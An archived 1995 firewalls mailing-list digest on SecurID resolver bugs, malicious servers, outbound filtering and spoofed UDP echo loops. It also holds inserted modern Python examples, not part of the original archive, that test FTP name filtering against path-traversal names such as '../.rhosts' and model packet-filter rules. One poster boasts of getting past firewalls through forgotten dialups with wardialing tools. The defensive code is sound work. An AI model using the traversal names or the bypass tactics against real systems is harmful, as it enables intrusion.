CC: firewalls@greatcircle.com
Subject: Re: ACE SecureID Flaw (SunOS 4.1.x)
Newsgroups: kei.mail.firewalls
In-Reply-To: <9505170303.ZM272@death.netsys.com>
References: <9505170303.ZM272@death.netsys.com>
X-Attribution: ckd
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

LR> == Len Rose

LR> Has anyone noted that ACE has linked their code against
LR> /usr/5lib/libc.so.2.9, which unfortunately has the braindead resolver
LR> (NIS/hosts)? [...]
LR> They need to get with the program and link against the real resolver
LR> routines in libc.so.1.9.x that use BIND (or at least offer 2 versions
LR> of the binaries)

Um, no. Out of the box on SunOS 4.1.x, both /usr/lib/libc.so.1.x (the BSD shared libraries) and /usr/5lib/libc.so.2.x (the SysV shared libraries) use NIS (if running) or /etc/hosts (if not).

Given your description it sounds like you've replaced the gethostby* routines in the BSD shared libraries, but not in the SysV shared libraries. This is commonly done simply because not much (other than vi, and when does *that* resolve hostnames?) uses the SysV shared libraries.

The shres/INSTALL instructions in BIND 4.9.3 (currently at BETA17) include directions (and a script) for updating both BSD and SysV shared libraries.
They should probably add a note about this in their documentation, though, since (as I mentioned earlier) many people skip updating the SysV libs.

--
Christopher Davis * * 512/03829F89 = D7 C9 A7 80 8C 84 3F B2 27 E1 48 61 BF FC 18 B4
1024/66CB73DD = 46 8E FD F5 12 8E 13 4C 2C 8A 92 A3 B0 D5 2A 5E
[ Public keys available by finger, WWW, or keyserver ]

From firewalls-owner Wed May 17 12:51:25 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA22212 for firewalls-outgoing; Wed, 17 May 1995 10:50:32 -0700
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA22207 for ; Wed, 17 May 1995 10:50:29 -0700
Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQyqdj10185; Wed, 17 May 1995 13:50:09 -0400
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28062; Wed, 17 May 95 13:45:07 EDT
Date: Wed, 17 May 1995 13:45:06 -0400 (EDT)
From: Sick Puppy
Subject: Re: Malicious Servers. Do clients guard against?
To: maillet@usmcs.maine.edu
Cc: Firewalls@GreatCircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There are a couple of sites on the Internet running web servers which have been modified to assist their owners by facilitating the free exchange of information. I noticed that when I connect to one of these, while I am reading web pages the server is trying to establish connections back to me and use other services than www. On two occasions when I traced exactly what the web server was doing, it was trying to find various files in my system and to get my system to mail the files back to it.

I tried going out through a TIS machine to these servers, and the TIS machine spat out all kinds of alerts while it blocked the attempted connections. Mentioned this to mjr at SANS 95 and he seemed to think that I was mistaken about what the web servers were trying to do.
With all due respect to the significant expertise of mjr, the bottom line is that a TIS machine does look for attacks against the client (actually against the TIS proxy agent), whether it was designed to or not.

Generally I try to go around firewalls rather than go through them, so can't comment on the other popular firewalls. Most shops with good firewalls have completely unrestricted dialups on older systems that they forgot about. Ah, the blessings of ToneLoc. Gobbler is like cheating though, makes it just too easy.

Le Sick Puppy ze Cat_Eating_Dawg
Blaque Elicopter Pilot
Secret Internacional Armee targeting the Michigan Militia

From firewalls-owner Wed May 17 13:19:24 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA24574 for firewalls-outgoing; Wed, 17 May 1995 12:10:07 -0700
Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA24569 for ; Wed, 17 May 1995 12:10:02 -0700
Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id PAA21473 for ; Wed, 17 May 1995 15:08:35 -0400
Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id smaa21424; Wed May 17 15:07:28 1995
Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id PAA09216 for ; Wed, 17 May 1995 15:05:18 -0400
Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 15:10:23 +1100
Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 15:09:38 +1100
From: "ANNA M. KING"
Organization: New York State Insurance Fund
To: firewalls@GreatCircle.com
Date: Wed, 17 May 1995 15:09:31 EST
Subject: Re: Packet filtering for NT firewall
Priority: normal
X-mailer: Pegasus Mail/Windows (v1.22)
Message-ID:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> And watch out about sending 3000 or so extra lines in your messages :-)
>
> Regards,
> Mike

Sorry about the extra lines. And thanks for the rapid and helpful responses.

-Anna

From firewalls-owner Wed May 17 13:43:31 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25664 for firewalls-outgoing; Wed, 17 May 1995 12:55:23 -0700
Received: from hp.com (hp.com [15.255.152.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA25659 for ; Wed, 17 May 1995 12:55:18 -0700
Received: from hpindda.cup.hp.com by hp.com with ESMTP (1.37.109.15/15.5+ECS 3.3) id AA240710491; Wed, 17 May 1995 12:54:51 -0700
Received: from localhost by hpindda.cup.hp.com with SMTP (1.37.109.15/15.5+IOS 3.20+cup+OMrelay) id AA138250455; Wed, 17 May 1995 12:54:15 -0700
Message-Id: <199505171954.AA138250455@hpindda.cup.hp.com>
To: Adam Safier
Cc: firewalls@GreatCircle.COM, smith@sctc.com
Subject: Re: Why control outbound traffic?
In-Reply-To: Your message of "Wed, 17 May 1995 13:38:41 EDT."
Date: Wed, 17 May 1995 12:54:15 -0700
From: Abraham Lui
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

| > >1. No. There is not a security problem with allowing unrestricted
| outgoing
| > >traffic [from a technical perspective].
| >
| > It all depends on what you mean by "unrestricted" and what you mean by
| > "a technical perspective."
| >
| > Further restrictions reduce the organization's window of vulnerability
| > to more sophisticated technical attacks, as Andrew Molitor pointed
| > out.
|
| In theory users could run X-Terminal protocol through the firewall.
| Since their workstation is the "Server" the outside "Client" could
| request keystrokes, function key presses etc. I've done it in house with
| "dumb" terminals and terminal emulator scripts (before I knew there was
| something more than Hayes modems). I don't see why that attack would not
| work with X-Terms.
|
| I suggest cutting off outgoing X-Term traffic.
|
| Do any sites actually allow outsiders to run custom X-Windows applications?
|
| 2c worth.
| Adam

TIS provides an X-gw which allows the owner of the X server to allow or deny the connection request from an X client sitting outside the firewall. This provides "some" protection.

Abraham

+-------------------------------------------+---------------------------------+
|Abraham Lui (Member, Technical Staff)      |Bldg: 43L; MS 43LM; Pillar P7    |
|Information Networks Division              |Phone: 408-447-2403              |
|Hewlett-Packard Company                    |Telnet: 1-447-2403               |
|19420 Homestead Road, MS 43LM              |Fax: 408-447-3660                |
|Cupertino, CA 95014-9807                   |Email: abraham@cup.hp.com        |
+-------------------------------------------+---------------------------------+

From firewalls-owner Wed May 17 13:48:46 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA26276 for firewalls-outgoing; Wed, 17 May 1995 13:14:41 -0700
Received: from isis.u-strasbg.fr (isis.u-strasbg.fr [130.79.200.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA26260 for ; Wed, 17 May 1995 13:14:33 -0700
Received: from des3.u-strasbg.fr (des3.u-strasbg.fr [130.79.7.62]) by isis.u-strasbg.fr (8.6.9/8.6.9) with SMTP id WAA11068 for ; Wed, 17 May 1995 22:12:28 +0200
Received: by des3.u-strasbg.fr (4.1/SMI-3.2-jjp/4/6/92) id AA07071; Wed, 17 May 95 22:11:10 +0100
Date: Wed, 17 May 95 22:11:10 +0100
From: detzel@des3.u-strasbg.fr (???)
Message-Id: <9505172111.AA07071@des3.u-strasbg.fr>
To: firewalls@GreatCircle.COM
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Eric.Salome@siege.cnes.fr wrote:

>You might be cautious enough to get the files, being in your /var/tmp
>directory.
>But what happens if my ftp server generates, in response to your mget
>command, among many named.* file names, a "/etc/passwd" file name ?
>(I can even be more subtle than just rewriting your /etc/passwd file).
>Would it work ?

I think it will. But if you use ftp from FWTK (which issues a chroot) it won't hurt anything in this case. Am I right?

From firewalls-owner Wed May 17 14:07:23 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA26315 for firewalls-outgoing; Wed, 17 May 1995 13:15:39 -0700
Received: from ncar.UCAR.EDU (ncar.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA26309 for ; Wed, 17 May 1995 13:15:35 -0700
Message-Id: <199505172015.OAA22959@ncar.ucar.EDU>
Received: by ncar.ucar.EDU (NCAR-local/ NCAR Central Post Office 03/11/93) id OAA22959; Wed, 17 May 1995 14:15:08 -0600
Subject: Re: ACE SecureID Flaw (SunOS 4.1.x)
To: len@NETSYS.COM (Len Rose)
Date: Wed, 17 May 95 14:15:07 MDT
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9505170303.ZM272@death.netsys.com>; from "Len Rose" at May 17, 95 3:03 am
From: woods@ncar.ucar.edu (Greg Woods)
X-Mailer: ELM [version 2.3 PL11]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Has anyone noted that ACE has linked their code against /usr/5lib/libc.so.2.9,
> which unfortunately has the braindead resolver (NIS/hosts)? This has critical
> ramifications for anyone who is smart enough to avoid NIS within/without
> their networks.

That probably explains another problem I have encountered with ACE. If your client is multi-homed, it flat out won't work (always says "Access denied" and the log messages show "PRN incorrect" as if the wrong passcode had been entered). Were it not for the TIS authentication server, we'd be up the creek without a paddle.
(Instead of assigning users sdshell, I used login-sh, and then as far as ACE is concerned the client is the machine running the authentication server rather than the machine the user is trying to get access to).

> Unfortunately when I tried to explain the ramifications of this to their
> tech support folks, they didn't seem to understand why it was a problem.

They are aware that the client code has problems on multi-homed hosts, but the people you get to on the phone (even after they connect you to an "engineer") have no clue as to why or how to work around it.

> They need to get with the program and link against the real resolver
> routines in libc.so.1.9.x that use BIND (or at least offer 2 versions of
> the binaries)

Yes. Please. All the hosts that are going to be part of our firewall are multi-homed and those are the ones we need secure access to!

--Greg

From firewalls-owner Wed May 17 14:32:34 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA26753 for firewalls-outgoing; Wed, 17 May 1995 13:30:56 -0700
Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA26748 for ; Wed, 17 May 1995 13:30:52 -0700
Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id QAA23803 for ; Wed, 17 May 1995 16:29:27 -0400
Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id sma023797; Wed May 17 16:29:12 1995
Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id QAA09925 for ; Wed, 17 May 1995 16:24:29 -0400
Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 16:29:01 +1100
Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 16:28:40 +1100
From: "ANNA M. KING"
Organization: New York State Insurance Fund
To: firewalls@GreatCircle.com
Date: Wed, 17 May 1995 16:28:35 EST
Subject: Re: Packet filtering for NT firewall
Priority: normal
X-mailer: Pegasus Mail/Windows (v1.22)
Message-ID:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wednesday 17 May Mike Murphy said:

> >I am setting up an NT firewall to direct traffic from some other
> >network, the firewall will be connected to a CISCO router with
> >multiple serial ports connected to multiple networks of various
> >types, to a particular machine ( mainframe or application server).
> >What I need is packet filtering software. Any suggestions about what
> >is best would be appreciated.
>
> Dump NT, get FreeBSD, NetBSD, or BSDI, and run TIS FWTK
> on it with IPFILTER packet filtering.
>

Maybe firewall isn't what I have in mind. The NT machine will have two purposes; as suggested by others the CISCO router will do the packet filtering, but I need to log who is accessing our network and use it as a possible mailhub to route email to whoever is attached to us through the routers. Unix seems to me to be overkill.

> And watch out about sending 3000 or so extra lines in your messages :-)
>

Sorry about that, must have fallen asleep.
Regards,
Anna

From firewalls-owner Wed May 17 14:38:59 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27213 for firewalls-outgoing; Wed, 17 May 1995 13:48:32 -0700
Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA27206 for ; Wed, 17 May 1995 13:48:28 -0700
Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id QAA06620; Wed, 17 May 1995 16:43:02 -0400
Date: Wed, 17 May 1995 16:43:01 -0400 (EDT)
From: David Miller
Subject: Re: Requesting "echo"
To: eav1001@Umoncton.CA
cc: firewalls@greatcircle.com
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 17 May 1995 eav1001@Umoncton.CA wrote:

>
> > On Wed, 17 May 1995, Jean-Christophe Touvet wrote:
> >
> > > Not blocking the echo port (port 7) or somehow preventing packets with
> > > spoofed IP addresses from entering the system could be even more
> > > disastrous to a site. Consider this scenario:
> > >
> > > A packet enters the network with a spoofed IP address (say of the
> > > backup server), with source port 514 (port for remote shell), and the
> > > payload consisting of a valid RSH-type "header" and content. This
> > > packet then gets echoed back to the backup server with the IP source
> > > address of the client. If the server trusts this host (and most
> > > backup hosts must, so remote dumps can happen), then what?
> >
> > Hmm, I'm not sure it would be so easy with TCP services.
> >
> > But there is at least one very annoying attack with UDP echo: send a spoofed
> > UDP packet with both source and destination port=7. Guess what ?
> >                                                  ^^^^^^^^^^
> > -JCT-
> >
>
> what to guess ?
> would you, guys, give more explanations please ?

The packet would drive the machine nuts. The system would keep sending itself "please send me an echo message".
>
> Also,
> what is a spoofed UDP packet ?

A packet that has the wrong source address in it. In this case, the source address would be the same as the destination address and equal to the target system, as opposed to having the source address of the machine it actually originated on.

>
> Thank you and hava gooday...!
>

Uh, guys? I think we're leaving the firewalls topic behind. If anyone really wants to continue this discussion, take it to bugtraq or something.

Thanks

----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!

From firewalls-owner Wed May 17 15:04:50 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29456 for firewalls-outgoing; Wed, 17 May 1995 14:56:05 -0700
Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA29449 for ; Wed, 17 May 1995 14:56:01 -0700
Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id SAA27036 for ; Wed, 17 May 1995 18:04:49 -0400
Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma027032; Wed May 17 18:04:27 1995
Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id RAA05521 for ; Wed, 17 May 1995 17:58:57 -0400
From: Michael Richardson
Received: by metis.milkyway.com (8.6.9/BSDI-Client) id RAA04005; Wed, 17 May 1995 17:54:03 -0400
Date: Wed, 17 May 1995 17:54:03 -0400
Message-Id: <199505172154.RAA04005@metis.milkyway.com>
To: firewalls@greatcircle.com
Subject: Re: Why control outbound traffic?
Newsgroups: milkyway.mail.firewalls
In-Reply-To: <199505171954.AA138250455@hpindda.cup.hp.com>
References:
Organization: Milkyway Networks Corporation
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <199505171954.AA138250455@hpindda.cup.hp.com> you write:
>| In theory users could run X-Terminal protocol through the firewall.
>| Since their workstation is the "Server" the outside "Client" could
>| request keystrokes, function key presses etc. I've done it in

>TIS provides a X-gw which allows the owner of the x-server to allow
>or deny the connection request from a Xclient sitting outside the
>firewall. This provides "some" protection.

No, it provides no protection because the X server is on the bad guy's desk.

As several others have pointed out, you restrict outgoing traffic, and often even authenticate users before they are allowed out because if an internal host is convinced to run some trojan code (%) it can simply start an outgoing connection, execv("/bin/sh") on the port, and the bad guy waits with accept(2). All of the recent sendmail, httpd, unpatched plexus (with perl5), etc.. holes that have surfaced in the past several years were of the "get this code to run" variety. If this kind of thing worries you then you need an application layer firewall not a router with "established" stuff.

(%) I'm waiting for a DOS/Windows/Mac virus/trojan that does *nothing* to machines until it sees WinSock or MacTCP active, then it copies your hard disk to BadGuy.com, probably using FSP on port 53.

--
:!mcr!: | Milkyway Networks Corporation
Michael Richardson | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.
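Returning to the FTP example in the "Malicious Servers" thread earlier in this digest (a server answering "mget named.*" with a name such as /etc/passwd): the chroot in the FWTK ftp proxy limits the damage, but the client itself should refuse such names before it opens a local file. The code below is an added example, not code from the list, from FWTK or from any FTP client. The download directory and the hostile NLST reply are constructed for the example; the checks are the ones a client should apply to every name the remote side supplies.

```python
"""Client-side check on file names an FTP server hands back during mget.

Added example for the "Malicious Servers (FTP example)" thread; not code from
the list, from FWTK or from any FTP client. A hostile server can answer NLST
with names such as "/etc/passwd" or "../.rhosts"; a client that trusts them
writes wherever the server says. The download directory and the listing below
are constructed for the example.
"""
import os
import posixpath
from typing import List, Optional, Tuple

MAX_NAME = 255


def is_safe_remote_name(name: str) -> bool:
    """Accept only a plain, visible file name that stays inside the download directory."""
    if not name or len(name) > MAX_NAME:
        return False
    if name.startswith("/") or "\\" in name:      # absolute path, or a DOS-style separator
        return False
    if name.startswith("."):                       # would let the server plant .rhosts or .forward
        return False
    if "/" in name or posixpath.normpath(name) != name:   # "dir/x", "../x", "a/../b", trailing "/"
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):  # newlines and other control chars
        return False
    return True


def filter_mget_listing(listing: List[str]) -> Tuple[List[str], List[str]]:
    """Split a server-supplied listing into names the client may fetch and names it must refuse."""
    accepted: List[str] = []
    rejected: List[str] = []
    for name in listing:
        (accepted if is_safe_remote_name(name) else rejected).append(name)
    return accepted, rejected


def local_target(download_dir: str, name: str) -> Optional[str]:
    """Where the file would be written, or None if it would land outside download_dir.

    The realpath comparison is an independent second check: it also catches an
    existing symlink in the download directory that points somewhere else.
    """
    if not is_safe_remote_name(name):
        return None
    root = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:
        return None
    return target


# Constructed NLST reply from a hostile server answering "mget named.*".
HOSTILE_LISTING = [
    "named.boot",
    "named.ca",
    "/etc/passwd",
    "../.rhosts",
    "named.local",
    ".rhosts",
    "named/../../etc/hosts.equiv",
    "bin\\..\\..\\autoexec.bat",
    "named.pid\n",
]

if __name__ == "__main__":
    fetch, refuse = filter_mget_listing(HOSTILE_LISTING)
    print("fetch: ", fetch)
    print("refuse:", refuse)
```

Only the three named.* files survive the filter; everything else in the constructed reply is refused. The two checks are deliberately independent: the name filter rejects anything that is not a bare file name, and the realpath comparison confirms where the write would actually land, which also catches a symlink already sitting in the download directory.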
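Both the UDP echo thread above (a spoofed packet with source and destination port 7) and the point just made about outbound connections (a trojaned internal host connecting out, execv("/bin/sh") on the socket, the attacker waiting in accept(2)) come down to which packets a border filter lets through. The following is an added example, not code from the list, from FWTK or from any router vendor: a small stateless rule evaluator that applies two policies to the same constructed traffic, a "router with established" policy that permits anything initiated from inside, and a default-deny egress policy that lets inside hosts reach only an application gateway. The internal network 192.168.77.0/24, the gateway address 192.168.77.1, the TEST-NET outside addresses and the packets themselves are assumptions made for the example.

```python
"""Stateless border-filter model for two points raised in the thread: why a
router that relies on "established" does not stop an internal host from opening
a connection outward (the trojan that runs execv("/bin/sh") on a socket while
the attacker waits in accept(2)), and why spoofed-source and echo/chargen
packets must be dropped before anything else is considered.

Added example; not code from the list, from FWTK or from any router vendor.
The internal network, the gateway host, the rule sets and the packets are all
assumptions constructed for the example.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Callable, Dict, List, Optional, Tuple

INTERNAL_NET = ip_network("192.168.77.0/24")   # assumed internal network
PROXY_HOST = ip_address("192.168.77.1")        # assumed application-gateway host
SMALL_SERVICES = {7, 9, 13, 19}                # echo, discard, daytime, chargen


@dataclass(frozen=True)
class Packet:
    proto: str             # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    ack: bool = False      # TCP ACK bit: the only thing a router's "established" keyword tests
    iface: str = "inside"  # interface the packet arrived on: "inside" or "outside"


# A rule is (name, action, predicate); first match wins, implicit deny at the end.
Rule = Tuple[str, str, Callable[[Packet], bool]]


def evaluate(policy: List[Rule], pkt: Packet) -> Tuple[str, str]:
    """Return (action, name of the rule that decided it)."""
    for name, action, match in policy:
        if match(pkt):
            return action, name
    return "deny", "implicit-deny"


def spoofed_internal_source(p: Packet) -> bool:
    # Anything arriving from outside with an internal source address is forged.
    return p.iface == "outside" and ip_address(p.src) in INTERNAL_NET

def small_service_loop(p: Packet) -> bool:
    # UDP between two small services (echo<->echo, chargen->echo) answers itself forever;
    # with a spoofed source it loops a host against itself or against another victim.
    return p.proto == "udp" and p.sport in SMALL_SERVICES and p.dport in SMALL_SERVICES

def tcp_established(p: Packet) -> bool:
    return p.proto == "tcp" and p.ack

def from_inside(p: Packet) -> bool:
    return p.iface == "inside"

def inside_to_proxy(p: Packet) -> bool:
    return p.iface == "inside" and ip_address(p.dst) == PROXY_HOST

def proxy_outbound(p: Packet) -> bool:
    return p.iface == "inside" and ip_address(p.src) == PROXY_HOST


# Anti-spoof must precede "established": a forged ACK from outside would otherwise match it.
COMMON_RULES: List[Rule] = [
    ("deny-spoofed-internal", "deny", spoofed_internal_source),
    ("deny-udp-small-service-loop", "deny", small_service_loop),
    ("permit-tcp-established", "permit", tcp_established),
]

# "Router with established": anything initiated from inside may leave.
ROUTER_POLICY: List[Rule] = COMMON_RULES + [("permit-any-outbound", "permit", from_inside)]

# Default-deny egress: inside hosts reach only the gateway, and only the gateway talks out.
EGRESS_POLICY: List[Rule] = COMMON_RULES + [
    ("permit-inside-to-proxy", "permit", inside_to_proxy),
    ("permit-proxy-outbound", "permit", proxy_outbound),
]

# Constructed traffic; TEST-NET addresses stand in for outside hosts.
TRAFFIC: Dict[str, Packet] = {
    "reverse-shell":        Packet("tcp", "192.168.77.21", 1025, "203.0.113.5", 31337),
    "browse-via-proxy":     Packet("tcp", "192.168.77.21", 1026, "192.168.77.1", 8080),
    "proxy-fetch":          Packet("tcp", "192.168.77.1", 33000, "198.51.100.10", 80),
    "proxy-fetch-reply":    Packet("tcp", "198.51.100.10", 80, "192.168.77.1", 33000, ack=True, iface="outside"),
    "spoofed-echo-to-self": Packet("udp", "192.168.77.9", 7, "192.168.77.9", 7, iface="outside"),
    "chargen-to-echo":      Packet("udp", "203.0.113.5", 19, "192.168.77.9", 7, iface="outside"),
    "forged-ack-inbound":   Packet("tcp", "192.168.77.9", 514, "192.168.77.21", 1023, ack=True, iface="outside"),
    "inbound-telnet-syn":   Packet("tcp", "203.0.113.5", 2001, "192.168.77.21", 23, iface="outside"),
}


def compare(policies: Optional[Dict[str, List[Rule]]] = None) -> Dict[str, Dict[str, str]]:
    """Verdict of each policy for each constructed packet: {packet: {policy: action}}."""
    policies = policies or {"router": ROUTER_POLICY, "egress": EGRESS_POLICY}
    return {name: {pol: evaluate(rules, pkt)[0] for pol, rules in policies.items()}
            for name, pkt in TRAFFIC.items()}


if __name__ == "__main__":
    for name, verdicts in compare().items():
        print(f"{name:22s}", "  ".join(f"{pol}={act}" for pol, act in verdicts.items()))
```

Run stand-alone it prints one verdict line per packet. The only packet the two policies disagree on is the reverse shell: it is a connection initiated from inside, so the "established"-style router lets it out, while the egress policy drops it because the destination is not the gateway. The spoofed echo packet and the forged inbound ACK are both stopped by the anti-spoof rule, which is why that rule has to sit in front of the "established" rule rather than behind it.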
From firewalls-owner Wed May 17 15:32:04 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA00365 for firewalls-outgoing; Wed, 17 May 1995 15:18:09 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA00360 for ; Wed, 17 May 1995 15:18:04 -0700
Message-Id: <199505172218.PAA00360@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA273159149; Thu, 18 May 1995 08:19:09 +1000
From: Darren Reed
Subject: Re: Packet filtering for NT firewall
To: AMK@dssvr1.sif.state.ny.us (ANNA M. KING)
Date: Thu, 18 May 1995 08:19:09 +1000 (EST)
Cc: firewalls@GreatCircle.com
In-Reply-To: from "ANNA M. KING" at May 17, 95 04:28:35 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1578
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from ANNA M. KING, they said:
>
> On Wednesday 17 May Mike Murphy said:
>
> > >I am setting up an NT firewall to direct traffic from some other
> > >network, the firewall will be connected to a CISCO router with
> > >multiple serial ports connected to multiple networks of various
> > >types, to a particular machine ( mainframe or application server).
> > >What I need is packet filtering software. Any suggestions about what
> > >is best would be appreciated.
> >
> > Dump NT, get FreeBSD, NetBSD, or BSDI, and run TIS FWTK
> > on it with IPFILTER packet filtering.
> >
> Maybe firewall isn't what I have in mind. The NT machine will have
> two purposes; as suggested by others the CISCO router will do the packet
> filtering, but I need to log who is accessing our network and use it
> as a possible mailhub to route email to whoever is attached to us through
> the routers. Unix seems to me to be overkill.

You need to look at what you're doing here. Unix does what you want very easily and if you're using any of the above you have a large amount of control over your system.
The cost is finding someone who can set this up for you if you can't.

NT is all blackbox material. I suspect that unless you're someone called Microsoft, you would have no chance of writing firewall s/w for NT.

Unix doesn't have to be something you run on "big" computers and it is going to provide you with everything you need to do what you need. I'd be more inclined to say that in situations like firewalls, NT just isn't an appropriate solution.

darren

From firewalls-owner Wed May 17 16:01:25 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA01508 for firewalls-outgoing; Wed, 17 May 1995 15:59:32 -0700
Received: from netcom23.netcom.com (netcom23.netcom.com [192.100.81.137]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA01501 for ; Wed, 17 May 1995 15:59:27 -0700
Received: by netcom23.netcom.com (8.6.12/Netcom) id PAA05315; Wed, 17 May 1995 15:58:28 -0700
From: okuyama@netcom.com (Darin Okuyama)
Message-Id: <199505172258.PAA05315@netcom23.netcom.com>
Subject: building x-gw ..
To: firewalls@greatcircle.com (Firewall Mailing List)
Date: Wed, 17 May 1995 15:58:27 -0700 (PDT)
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 375
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am trying to build "x-gw" on a Sun running SunOS 4.1.3, and I get the following error:

    cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \
        -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv

    ld: Undefined symbol
       _get_wmShellWidgetClass
       _get_applicationShellWidgetClass

Am I missing a library? Or are they in the wrong order?
---Darin Okuyama

From firewalls-owner Wed May 17 16:23:34 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA01069 for firewalls-outgoing; Wed, 17 May 1995 15:47:47 -0700
Received: from hp.com (hp.com [15.255.152.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA01064 for ; Wed, 17 May 1995 15:47:43 -0700
Received: from hpindda.cup.hp.com by hp.com with ESMTP (1.37.109.15/15.5+ECS 3.3) id AA164200843; Wed, 17 May 1995 15:47:23 -0700
Received: from localhost by hpindda.cup.hp.com with SMTP (1.37.109.15/15.5+IOS 3.20+cup+OMrelay) id AA003930806; Wed, 17 May 1995 15:46:46 -0700
Message-Id: <199505172246.AA003930806@hpindda.cup.hp.com>
To: Michael Richardson
Cc: firewalls@GreatCircle.COM
Subject: Re: Why control outbound traffic?
In-Reply-To: Your message of "Wed, 17 May 1995 17:54:03 EDT." <199505172154.RAA04005@metis.milkyway.com>
Date: Wed, 17 May 1995 15:46:46 -0700
From: Abraham Lui
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

| >TIS provides a X-gw which allows the owner of the x-server to allow
| >or deny the connection request from a Xclient sitting outside the
| >firewall. This provides "some" protection.
|
| No, it provides no protection because the X server is on the bad
| guy's desk.

This is only half true. The TIS X-gw can control traffic in either direction. The X server is NOT necessarily on the bad guy's desk.
Abe

+-------------------------------------------+---------------------------------+
|Abraham Lui (Member, Technical Staff)      |Bldg: 43L; MS 43LM; Pillar P7    |
|Information Networks Division              |Phone: 408-447-2403              |
|Hewlett-Packard Company                    |Telnet: 1-447-2403               |
|19420 Homestead Road, MS 43LM              |Fax: 408-447-3660                |
|Cupertino, CA 95014-9807                   |Email: abraham@cup.hp.com        |
